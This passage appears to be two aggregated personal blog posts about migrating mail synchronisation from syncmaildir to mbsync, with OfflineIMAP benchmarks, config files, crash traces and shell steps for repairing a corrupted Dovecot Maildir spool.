C: 0/2  B: 0/1  F: +0/0 *0/0 #0/0  N: +0/0 *0/0 #0/0imap(anarcat): Error: net_connect_unix(/run/dovecot/stats-writer) failed: Permission denied
C: 2/2  B: 205/205  F: +0/0 *0/0 #0/0  N: +1/1 *3/3 #0/0imap(anarcat)<1611280><90uUOuyElmEQlhgAFjQyWQ>: Info: Logged out in=10808 out=15396642 deleted=0 expunged=0 trashed=0 hdr_count=0 hdr_bytes=0 body_count=1 body_bytes=8087
It's a bit noisy, however. dovecot/imap doesn't have a "usage" to speak of, but even the source code doesn't hint at a way to disable that Error message, so that's unfortunate. That socket is owned by root:dovecot so presumably Dovecot runs the imap process as $user:dovecot, which we can't do here. Oh well? Interestingly, the SSH setup is not faster than IMAP. With IMAP:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.367       0.065       2.220       2.376       2.458       
user        0.793       0.047       0.731       0.776       0.871       
sys         0.426       0.040       0.364       0.434       0.476
With SSH:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.515       0.088       2.274       2.532       2.594       
user        0.753       0.043       0.645       0.766       0.804       
sys         0.328       0.045       0.212       0.340       0.393
Basically: 200ms slower. Tolerable.

Migrating from SMD The above was how I migrated to mbsync on my first workstation. The work on the second one was more streamlined, especially since the corruption on mailboxes was fixed:
  1. install isync, with the patch:
    dpkg -i isync_1.4.3-1.1~_amd64.deb
    
  2. copy all files over from previous workstation to avoid a full resync (optional):
    rsync -a --info=progress2 angela:Maildir/ Maildir-mbsync/
    
  3. rename all files to match new hostname (optional):
    find Maildir-mbsync/ -type f -name '*.angela,*' -print0 | rename -0 's/\.angela,/\.curie,/'
    
  4. trash the notmuch database (optional):
    rm -rf Maildir-mbsync/.notmuch/xapian/
    
  5. disable all smd and notmuch services:
    systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
    
  6. do one last sync with smd:
    smd-pull --show-tags ; smd-push --show-tags ; notmuch new ; notmuch-sync-flagged -v
    
  7. backup notmuch on the client and server:
    notmuch dump | pv > notmuch.dump
    
  8. backup the maildir on the client and server:
    cp -al Maildir Maildir-bak
    
  9. create the SSH key:
    ssh-keygen -t ed25519 -f .ssh/id_ed25519_mbsync
    cat .ssh/id_ed25519_mbsync.pub
    
  10. add to .ssh/authorized_keys on the server, like this: command="/usr/lib/dovecot/imap",restrict ssh-ed25519 AAAAC...
  11. move old files aside, if present:
    mv Maildir Maildir-smd
    
  12. move new files in place (CRITICAL SECTION BEGINS!):
    mv Maildir-mbsync Maildir
    
  13. run a test sync, only pulling changes: mbsync --create-near --remove-none --expunge-none --noop anarcat-register
  14. if that works well, try with all mailboxes: mbsync --create-near --remove-none --expunge-none --noop -a
  15. if that works well, try again with a full sync: mbsync register, then mbsync -a
  16. reindex and restore the notmuch database, this should take ~25 minutes:
    notmuch new
    pv notmuch.dump | notmuch restore
    
  17. enable the systemd services and retire the smd-* services:
    systemctl --user enable mbsync.timer notmuch-new.service
    systemctl --user start mbsync.timer
    rm ~/.config/systemd/user/smd*
    systemctl daemon-reload
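As an optional final check (not one of the author's steps), comparing message counts between the old and new spools with the same kind of find invocation used throughout this post can confirm nothing was lost in the move:
find Maildir-smd -type f -a \! -name '.*' | wc -l
find Maildir -type f -a \! -name '.*' | wc -l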
During the migration, notmuch helpfully told me the full list of those lost messages:
[...]
Warning: cannot apply tags to missing message: CAN6gO7_QgCaiDFvpG3AXHi6fW12qaN286+2a7ERQ2CQtzjSEPw@mail.gmail.com
Warning: cannot apply tags to missing message: CAPTU9Wmp0yAmaxO+qo8CegzRQZhCP853TWQ_Ne-YF94MDUZ+Dw@mail.gmail.com
Warning: cannot apply tags to missing message: F5086003-2917-4659-B7D2-66C62FCD4128@gmail.com
[...]
Warning: cannot apply tags to missing message: mailman.2.1316793601.53477.sage-members@mailman.sage.org
Warning: cannot apply tags to missing message: mailman.7.1317646801.26891.outages-discussion@outages.org
Warning: cannot apply tags to missing message: notmuch-sha1-000458df6e48d4857187a000d643ac971deeef47
Warning: cannot apply tags to missing message: notmuch-sha1-0079d8e0c3340e6f88c66f4c49fca758ea71d06d
Warning: cannot apply tags to missing message: notmuch-sha1-0194baa4cfb6d39bc9e4d8c049adaccaa777467d
Warning: cannot apply tags to missing message: notmuch-sha1-02aede494fc3f9e9f060cfd7c044d6d724ad287c
Warning: cannot apply tags to missing message: notmuch-sha1-06606c625d3b3445420e737afd9a245ae66e5562
Warning: cannot apply tags to missing message: notmuch-sha1-0747b020f7551415b9bf5059c58e0a637ba53b13
[...]
As detailed in the crash report, all of those were actually innocuous and could be ignored. Also note that we completely trash the notmuch database because it's actually faster to reindex from scratch than let notmuch slowly figure out that all mails are new and all the old mails are gone. The fresh indexing took:
nov 19 15:08:54 angela notmuch[2521117]: Processed 384679 total files in 23m 41s (270 files/sec.).
nov 19 15:08:54 angela notmuch[2521117]: Added 372610 new messages to the database.
A reindexing on top of an existing database, by comparison, went about half as fast, at about 120 files/sec.

Current config file Putting it all together, I ended up with the following configuration file:
SyncState *
Sync All
# IMAP side, AKA "Far"
IMAPAccount anarcat-imap
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"
IMAPStore anarcat-remote
Account anarcat-tunnel
# Maildir side, AKA "Near"
MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir/
# what binds Maildir and IMAP
Channel anarcat
Far :anarcat-remote:
Near :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
#Patterns *
Patterns * !register  !.register
# Automatically create missing mailboxes, both locally and on the server
Create Both
#Create Near
# Sync the movement of messages between folders and deletions, add after making sure the sync works
Expunge Both
# Propagate mailbox deletion
Remove both
IMAPAccount anarcat-register-imap
Host imap.anarc.at
User register
PassCmd "pass imap.anarc.at-register"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPAccount anarcat-register-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C register@imap.anarc.at /usr/lib/dovecot/imap"
IMAPStore anarcat-register-remote
Account anarcat-register-tunnel
MaildirStore anarcat-register-local
SubFolders Maildir++
Inbox ~/Maildir/.register/
Channel anarcat-register
Far :anarcat-register-remote:
Near :anarcat-register-local:
Create Both
Expunge Both
Remove both
Note that it may be out of sync with my live (and private) configuration file, as I do not publish my "dotfiles" repository publicly for security reasons.
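A cheap way to smoke-test a configuration like this without transferring anything is to just list the mailboxes each channel sees; if I remember the option correctly (check mbsync(1) for your version), that is:
mbsync -l anarcat
mbsync -l anarcat-register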

OfflineIMAP I had used OfflineIMAP for a long time before switching to SMD. I don't exactly remember why or when I started using it, but I do remember it became painfully slow as I started using notmuch, and would sometimes crash mysteriously. It's been a while, so my memory is hazy on that. It also kind of died in a fire when Python 2 stopped being maintained. The main author moved on to a different project, imapfw, which could serve as a framework to build IMAP clients, but never seemed to implement all of the OfflineIMAP features and certainly not configuration file compatibility. Thankfully, a new team of volunteers ported OfflineIMAP to Python 3 and we can now test that new version to see if it is an improvement over mbsync.

Crash on full sync The first thing that happened on a full sync is this crash:
Copy message from RemoteAnarcat:junk:
 ERROR: Copying message 30624 [acc: Anarcat]
  decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Thread 'Copy message from RemoteAnarcat:junk' terminated with exception:
Traceback (most recent call last):
  File "/usr/share/offlineimap3/offlineimap/imaputil.py", line 406, in utf7m_decode
    for c in binary.decode():
AttributeError: 'memoryview' object has no attribute 'decode'
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
  File "/usr/share/offlineimap3/offlineimap/threadutil.py", line 146, in run
    Thread.run(self)
  File "/usr/lib/python3.9/threading.py", line 892, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap
    ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1])
  File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes
    return self.parser.parsestr(text, headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr
    return self.parse(StringIO(text), headersonly=headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 56, in parse
    feedparser.feed(data)
  File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed
    self._call_parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse
    self._parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen
    if self._cur.get_content_type() == 'message/delivery-status':
  File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type
    value = self.get('content-type', missing)
  File "/usr/lib/python3.9/email/message.py", line 471, in get
    return self.policy.header_fetch_parse(k, v)
  File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse
    return self.header_factory(name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__
    return self[name](name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__
    cls.parse(value, kwds)
  File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse
    kwds['parse_tree'] = parse_tree = cls.value_parser(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header
    ctype.append(parse_mime_parameters(value[1:]))
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters
    token, value = get_parameter(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter
    token, value = get_value(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value
    token, value = get_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string
    token, value = get_bare_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string
    token, value = get_encoded_word(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word
    text, charset, lang, defects = _ew.decode('=?' + tok + '?=')
  File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode
    string = bstring.decode(charset)
AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Last 1 debug messages logged for Copy message from RemoteAnarcat:junk prior to exception:
thread: Register new thread 'Copy message from RemoteAnarcat:junk' (account 'Anarcat')
ERROR: Exceptions occurred during the run!
ERROR: Copying message 30624 [acc: Anarcat]
  decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap
    ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1])
  File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes
    return self.parser.parsestr(text, headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr
    return self.parse(StringIO(text), headersonly=headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 56, in parse
    feedparser.feed(data)
  File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed
    self._call_parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse
    self._parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen
    if self._cur.get_content_type() == 'message/delivery-status':
  File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type
    value = self.get('content-type', missing)
  File "/usr/lib/python3.9/email/message.py", line 471, in get
    return self.policy.header_fetch_parse(k, v)
  File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse
    return self.header_factory(name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__
    return self[name](name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__
    cls.parse(value, kwds)
  File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse
    kwds['parse_tree'] = parse_tree = cls.value_parser(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header
    ctype.append(parse_mime_parameters(value[1:]))
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters
    token, value = get_parameter(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter
    token, value = get_value(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value
    token, value = get_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string
    token, value = get_bare_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string
    token, value = get_encoded_word(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word
    text, charset, lang, defects = _ew.decode('=?' + tok + '?=')
  File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode
    string = bstring.decode(charset)
Folder junk [acc: Anarcat]:
 Copy message UID 30626 (29008/49310) RemoteAnarcat:junk -> LocalAnarcat:junk
Command exited with non-zero status 100
5252.91user 535.86system 3:21:00elapsed 47%CPU (0avgtext+0avgdata 846304maxresident)k
96344inputs+26563792outputs (1189major+2155815minor)pagefaults 0swaps
That only transferred about 8GB of mail, which gives us a transfer rate of 5.3Mbit/s, more than 5 times slower than mbsync. This bug is possibly limited to the bullseye version of offlineimap3 (the lovely 0.0~git20210225.1e7ef9e+dfsg-4), while the current sid version (the equally gorgeous 0.0~git20211018.e64c254+dfsg-1) seems unaffected.

Tolerable performance The new release still crashes, except it does so at the very end, which is an improvement, since the mails do get transferred:
 *** Finished account 'Anarcat' in 511:12
ERROR: Exceptions occurred during the run!
ERROR: Exception parsing message with ID (<20190619152034.BFB8810E07A@marcos.anarc.at>) from imaplib (response type: bytes).
 AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap
    raise OfflineImapError(
ERROR: Exception parsing message with ID (<40A270DB.9090609@alternatives.ca>) from imaplib (response type: bytes).
 AttributeError: decoding with 'x-mac-roman' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap
    raise OfflineImapError(
ERROR: IMAP server 'RemoteAnarcat' does not have a message with UID '32686'
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 889, in _fetch_from_imap
    raise OfflineImapError(reason, severity)
Command exited with non-zero status 1
8273.52user 983.80system 8:31:12elapsed 30%CPU (0avgtext+0avgdata 841936maxresident)k
56376inputs+43247608outputs (811major+4972914minor)pagefaults 0swaps
"offlineimap  -o " took 8 hours 31 mins 15 secs
This is 8h31m for transferring 12G, which is around 3.1Mbit/s. That is nine times slower than mbsync, almost an order of magnitude! Now that we have a full sync, we can test incremental synchronization. That is also much slower:
===> multitime results
1: sh -c "offlineimap -o || true"
            Mean        Std.Dev.    Min         Median      Max
real        24.639      0.513       23.946      24.526      25.708      
user        23.912      0.473       23.404      23.795      24.947      
sys         1.743       0.105       1.607       1.729       2.002
That is also an order of magnitude slower than mbsync, and significantly slower than what you'd expect from a sync process. ~30 seconds is long enough to make me impatient and distracted; 3 seconds, less so: I can wait and see the results almost immediately.

Integrity check That said: this is still on a gigabit link. It's technically possible that OfflineIMAP performs better than mbsync over a slow link, but I haven't tested that theory. The OfflineIMAP mail spool is missing quite a few messages as well:
anarcat@angela:~(main)$ find Maildir-offlineimap -type f -type f -a \! -name '.*' | wc -l
381463
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l
385247
... although that's probably all either new messages or the register folder, so OfflineIMAP might actually be in a better position there. But digging in more, it seems like the actual per-folder diff is fairly similar to mbsync: a few messages missing here and there. Considering OfflineIMAP's instability and poor performance, I have not looked any deeper in those discrepancies.

Other projects to evaluate Those are all the options I have considered, in alphabetical order:
  • doveadm-sync: requires dovecot on both ends, can tunnel over SSH, may have performance issues in incremental sync, written in C
  • fdm: fetchmail replacement, IMAP/POP3/stdin/Maildir/mbox/NNTP support, SOCKS support (for Tor), complex rules for delivering to specific mailboxes, adding headers, piping to commands, etc. Discarded because it has no (real) support for keeping mail on the server, and written in C
  • getmail: fetchmail replacement, IMAP/POP3 support, supports incremental runs, classification rules, Python
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap, but requires running an IMAP server locally, Perl
  • isync/mbsync: TLS client certs and SSH tunnels, fast, incremental, IMAP/POP/Maildir support, multiple mailbox, trash and recursion support, and generally has good words from multiple Debian and notmuch people (Arch tutorial), written in C, review above
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, mentions rsmtp which is a nice name for rsendmail. Not evaluated because it seems awfully complex to set up, Haskell
  • nncp: treat the local spool as another mail server, not really compatible with my "multiple clients" setup, Golang
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, review above, Python
Most projects were not evaluated due to lack of time.

Conclusion I'm now using mbsync to sync my mail. I'm a little disappointed by the synchronisation times over the slow link, but I guess that's par for the course if we use IMAP. We are bound by the network speed much more than with custom protocols. I'm also worried about the C implementation and the crashes I have witnessed, but I am encouraged by the fast upstream response. Time will tell if I will stick with that setup. I'm certainly curious about the promises of interimap and mail-sync, but I have run out of time on this project.

Antoine Beaupré: The last syncmaildir crash

My syncmaildir (SMD) setup failed me one too many times (previously, previously). In an attempt to migrate to an alternative mail synchronization tool, I looked into using my IMAP server again, and found out my mail spool was in a pretty bad shape. I'm comparing mbsync and offlineimap in the next post but this post talks about how I recovered the mail spool so that tools like those could correctly synchronise the mail spool again.

The latest crash On Monday, SMD just started failing with this error:
nov 15 16:12:19 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:12:22 angela systemd[2305]: smd-pull.service: Succeeded.
nov 15 16:12:22 angela systemd[2305]: Finished pull emails with syncmaildir.
nov 15 16:14:08 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:14:11 angela systemd[2305]: Failed to start pull emails with syncmaildir.
nov 15 16:16:14 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Unable to get any data from the other endpoint.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: This problem may be transient, please retry.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Hint: did you correctly setup the SERVERNAME variable
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: on your client? Did you add an entry for it in your ssh
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: configuration file?
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error
nov 15 16:16:17 angela smd-pull[27188]: register: smd-client@localhost: TAGS: error::context(handshake) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:16:17 angela systemd[2305]: Failed to start pull emails with syncmaildir.
What is frustrating is that there's actually no network error here. Running the command by hand I did see a different message, but now I have lost it in my backlog. It had something to do with a filename being too long, and I gave up debugging after a while. This happened suddenly too, which added to the confusion. In a fit of rage I started this blog post and experimenting with alternatives, which led me down a lot of rabbit holes. Reviewing my previous mail crash documentation, it seems most solutions involve talking to an IMAP server, so I figured I would just do that. Wanting to try something new, I gave isync (AKA mbsync) a try. Oh dear, I did not expect how much trouble just talking to my IMAP server would be, which wasn't isync's fault, for what that's worth. It was the primary tool I used to debug things, and served me well in that regard.

Mailbox corruption The first thing I found out is that certain messages in the IMAP spool were corrupted. mbsync would stop on a FETCH command and Dovecot would give me those errors on the server side.

"wrong W value"
nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Maildir filename has wrong W value, renamed the file from /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S to /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495:2,S
nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Deleting corrupted cache record uid=1582: UID 1582: Broken virtual size in mailbox junk: read(/home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S): FETCH BODY[] got too little data: 2540 vs 2578
At least this first error was automatically healed by Dovecot (by renaming the file without the W= flag). The problem is that the FETCH command fails and mbsync exits noisily. So you need to constantly restart mbsync with a silly command like:
while ! mbsync -a; do sleep 1; done

"cached message size larger than expected"
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=mail stream)
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: Deleting corrupted cache record uid=19288: UID 19288: Broken physical size in mailbox Sent: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288)
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=)
nov 16 13:53:08 marcos dovecot[3520770]: imap-login: Panic: epoll_ctl(del, 7) failed: Bad file descriptor
This second problem is much harder to fix, because dovecot does not recover automatically. This is Dovecot complaining that the cached size (the S= field, but also present in Dovecot's metadata files) doesn't match the file size. I wonder if at least some of those messages were corrupted in the OfflineIMAP to syncmaildir migration because part of that procedure is to run the strip_header script to remove content from the emails. That could easily have broken things since the files do not also get renamed.

Workaround So I read a lot of the Dovecot documentation on the maildir format, and wrote an extensive fix script for those two errors. The script worked and mbsync was able to sync the entire mail spool. And no, rebuilding the index files didn't work. I also tried doveadm force-resync -u anarcat, which didn't do anything. In the end I also had to do this, because the wrong cache values were also stored elsewhere:
service dovecot stop ; find -name 'dovecot*' -delete; service dovecot start
This would have totally broken any existing clients, but thankfully I'm starting from scratch (except maybe webmail, but I'm hoping it will self-heal as well, assuming it only has a cache and not a full replica of the mail spool).
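For the curious, the size-related half of such a repair could look something like the sketch below. This is not the author's fix script, only a rough illustration of the idea: rename files whose S= size field disagrees with the actual file size, so Dovecot stops tripping over them (the cache still needs flushing afterwards, as above).
find Maildir -type f -name '*,S=*' | while read -r path; do
  claimed=$(echo "$path" | sed 's/.*,S=\([0-9]*\).*/\1/')
  actual=$(stat -c %s "$path")
  if [ "$claimed" != "$actual" ]; then
    mv -n "$path" "$(echo "$path" | sed "s/,S=$claimed/,S=$actual/")"
  fi
done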

Incoherence between Maildir and IMAP Unfortunately, the first mbsync run was incomplete, as it was missing about 15,000 mails:
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l
384836
anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l
369221
As it turns out, mbsync was not at fault here either: this was yet more mail spool corruption. It's actually 26 folders (out of 205) with inconsistent sizes, which can be found with:
for folder in * .[^.]* ; do 
  printf "%s\t%d\n" $folder $(find "$folder" -type f -a \! -name '.*' | wc -l );
done
The special \! -name '.*' bit is to ignore the mbsync metadata, which creates .uidvalidity and .mbsyncstate in every folder. That ignores about 200 files, but since they are spread across all the folders, they were making it impossible to see where the problem was. Here is what the diff looks like:
--- Maildir-list    2021-11-17 20:42:36.504246752 -0500
+++ Maildir-mbsync-list 2021-11-17 20:18:07.731806601 -0500
@@ -6,16 +6,15 @@
[...]
 .Archives  1
 .Archives.2010 3553
-.Archives.2011 3583
-.Archives.2012 12593
+.Archives.2011 3582
+.Archives.2012 620
 .Archives.2013 8576
 .Archives.2014 11057
-.Archives.2015 8173
+.Archives.2015 8165
 .Archives.2016 54
 .band  34
 .bitbuck   1
@@ -38,13 +37,12 @@
 .couchsurfers  2
-cur    11285
+cur    11280
 .current   130
 .cv    2
 .debbug    262
-.debian    37544
-drafts 1
-.Drafts    4
+.debian    37533
+.Drafts    2
 .drone 241
 .drupal    188
 .drupal-devel  303
[...]
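(For reference, the Maildir-list and Maildir-mbsync-list files being diffed above were presumably produced by redirecting the per-folder count loop shown earlier, something like this:)
( cd Maildir && for folder in * .[^.]*; do printf "%s\t%d\n" "$folder" $(find "$folder" -type f -a \! -name '.*' | wc -l); done ) > Maildir-list
( cd Maildir-mbsync && for folder in * .[^.]*; do printf "%s\t%d\n" "$folder" $(find "$folder" -type f -a \! -name '.*' | wc -l); done ) > Maildir-mbsync-list
diff -u Maildir-list Maildir-mbsync-list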

Misfiled messages It's a bit all over the place, but we can already notice some huge differences between mailboxes, for example in the Archives folders. As it turns out, at least 12,000 of those missing mails were actually misfiled: instead of being in the Maildir/.Archives.2012/cur/ folder, they were directly in Maildir/.Archives.2012/. This is something that doesn't matter for SMD (and possibly for notmuch? actually it does matter: notmuch suddenly found 12,000 new mails) but that definitely matters to Dovecot and therefore mbsync... After moving those files around (see the sketch after the counts below), we still have 4,000 messages missing:
anarcat@angela:~(main)$ find Maildir-mbsync/  -type f -a \! -name '.*' | wc -l
381196
anarcat@angela:~(main)$ find Maildir/  -type f -a \! -name '.*' | wc -l
385053
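(The actual "moving those files around" step is not shown in the post; a hedged sketch, assuming the strays really were only in the Archives folders and that the files at each folder root are regular message files that belong in cur/, might be:)
for dir in Maildir/.Archives.*; do
  find "$dir" -maxdepth 1 -type f -a \! -name '.*' -exec mv -t "$dir/cur/" {} +
done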
The problem is that those 4,000 missing mails are harder to track. Take, for example, .Archives.2011, which has a single message missing, out of 3,582. And the files are not identical: the checksums don't match after going through the IMAP transport, so we can't use a tool like hashdeep to compare the trees and find why any single file is missing.

"register" folder One big chunk of the 4,000, however, is a special folder called register in my spool, which I am syncing separately (see Securing registration email for details on that setup). That actually covers 3,700 of those messages, so I actually have a more modest 300 messages to figure out, after (easily!) configuring mbsync to sync that folder separately:
 @@ -30,9 +33,29 @@ Slave :anarcat-local:
  # Exclude everything under the internal [Gmail] folder, except the interesting folders
  #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
  # Or include everything
 -Patterns *
 +#Patterns *
 +Patterns * !register  !.register
  # Automatically create missing mailboxes, both locally and on the server
  #Create Both
  Create slave
  # Sync the movement of messages between folders and deletions, add after making sure the sync works
  #Expunge Both
 +
 +IMAPAccount anarcat-register
